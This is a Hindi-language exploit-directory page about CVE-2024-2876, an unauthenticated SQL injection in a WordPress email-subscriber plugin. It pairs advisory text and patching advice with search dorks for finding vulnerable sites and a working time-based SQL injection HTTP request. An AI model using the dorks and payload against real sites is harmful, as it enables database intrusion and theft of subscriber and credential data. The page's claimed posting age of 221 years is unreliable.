Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-2876 — CVE-2024-2876 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Email Subscribers by Icegram Express WordPress प्लगइन में एक गंभीर SQL इंजेक्शन है, जो बिना प्रमाणीकरण के हमलावरों को मनमाना SQL क्वेरी निष्पादित करने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/aerchy/cve-2024-2876
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubaerchy/cve-2024-2876

CVE-2024-2876

CVE-2024-2876 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Email Subscribers by Icegram Express WordPress प्लगइन में एक गंभीर SQL इंजेक्शन है, जो बिना प्रमाणीकरण के हमलावरों को मनमाना SQL क्वेरी निष्पादित करने की अनुमति देता है।

रिपॉजिटरी देखें
221 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-2876 - Icegram Express द्वारा Email Subscribers में SQL इंजेक्शन भेद्यता

अवलोकन

CVE-2024-2876 WordPress के लिए "Email Subscribers by Icegram Express" प्लगइन में पाई गई एक गंभीर सुरक्षा भेद्यता है। यह भेद्यता 5.7.14 तक के संस्करणों को प्रभावित करती है और 90,000 से अधिक वेबसाइटों के लिए महत्वपूर्ण जोखिम पैदा करती है।

भेद्यता विवरण

  • CVE-ID: CVE-2024-2876
  • CVSS स्कोर: 9.8 (क्रिटिकल)
  • प्रभावित संस्करण: 5.7.14 तक
  • पैच किया गया संस्करण: 5.7.15 और उससे ऊपर

विवरण

यह भेद्यता एक SQL इंजेक्शन दोष है जो बिना प्रमाणीकरण वाले हमलावरों को प्रभावित WordPress डेटाबेस पर दुर्भावनापूर्ण SQL क्वेरी निष्पादित करने की अनुमति देता है। उपयोगकर्ता इनपुट में हेरफेर करके जो ठीक से सैनिटाइज़ नहीं किए गए हैं, हमलावर उपयोगकर्ता नाम, ईमेल पते, पासवर्ड हैश और सब्सक्राइबर सूचियों जैसी संवेदनशील जानकारी निकाल सकते हैं।

एक्सप्लॉइट तंत्र

SQL इंजेक्शन प्लगइन की IG_ES_Subscribers_Query क्लास के run फ़ंक्शन के भीतर होता है, जहाँ अपर्याप्त इनपुट सत्यापन अनधिकृत SQL कोड निष्पादन की ओर ले जाता है। यह WordPress डेटाबेस में संग्रहीत डेटा की अखंडता और गोपनीयता से समझौता करता है।

CVE-2024-2876 के लिए डॉर्क्स

  • FOFA : body="/wp-content/plugins/email-subscribers/"

  • publicwww : "/wp-content/plugins/email-subscribers/"

CVE-2024-2876 का POC

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

अनुशंसाएँ

  1. तत्काल अपडेट: यदि आप "Email Subscribers by Icegram Express" प्लगइन का उपयोग कर रहे हैं, तो सुरक्षा पैच लागू करने के लिए तुरंत संस्करण 5.7.15 या उससे ऊपर में अपग्रेड करें।

  2. नियमित ऑडिट: सुरक्षा सुनिश्चित करने के लिए सभी WordPress प्लगइन्स और थीम्स की नियमित रूप से समीक्षा करें और उन्हें नवीनतम संस्करणों में अपडेट करें।

  3. सुरक्षा प्लगइन्स: SQL इंजेक्शन और अन्य साइबर खतरों के खिलाफ सुरक्षा बढ़ाने के लिए प्रतिष्ठित WordPress सुरक्षा प्लगइन्स का उपयोग करें।

  4. मजबूत पासवर्ड नीतियाँ: अनधिकृत पहुँच के जोखिम को कम करने के लिए अपनी WordPress साइट से संबंधित सभी खातों के लिए मजबूत और अद्वितीय पासवर्ड लागू करें।

अनुपालन न करने का प्रभाव

प्रभावित प्लगइन को अपडेट करने में विफल रहने से वेबसाइटें डेटा उल्लंघनों और अनधिकृत पहुँच के प्रति संवेदनशील रह सकती हैं। इस प्लगइन के व्यापक उपयोग को देखते हुए, इंस्टॉलेशन को सुरक्षित करने के लिए तत्काल कार्रवाई महत्वपूर्ण है।

टूल डाउनलोड करें